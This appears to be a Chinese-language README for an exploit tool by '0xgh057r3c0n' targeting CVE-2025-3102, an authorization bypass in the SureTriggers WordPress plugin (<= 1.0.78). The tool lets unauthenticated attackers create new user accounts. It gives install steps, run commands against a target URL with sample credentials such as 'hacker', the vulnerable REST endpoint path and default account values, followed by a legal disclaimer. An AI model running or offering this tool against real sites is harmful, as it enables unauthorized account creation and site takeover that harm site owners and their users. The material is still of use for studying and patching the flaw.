本工具利用 SureTriggers WordPress 插件(版本 <= 1.0.78)中的授权绕过漏洞,允许未经身份验证的攻击者创建新的 WordPress 用户账户。
🔥 由 0xgh057r3c0n 开发
requests、colorama安装依赖:
pip3 install -r requirements.txt
或手动安装:
pip3 install requests colorama
python3 CVE-2025-3102.py -u <目标URL> [--newmail <邮箱>] [--newuser <用户名>] [--newpassword <密码>]
python3 CVE-2025-3102.py -u https://target-site.com --newuser hacker --newpassword Pass123!
readme.txt 检查插件版本。wp-json/sure-triggers/v1/automation/action。本工具仅用于教育和授权渗透测试目的。 未经授权访问系统是违法的,将受到法律制裁。 作者对任何滥用或造成的损害不承担责任。
| 参数 | 描述 | 默认值 |
|---|
-u, --url | WordPress 站点的基本 URL | 必填 |
--newmail | 新用户的邮箱地址 | [email protected] |
--newuser | 要创建的用户名 | 0xgh057r3c0n |
--newpassword | 新用户的密码 | Wiz007@8876@ |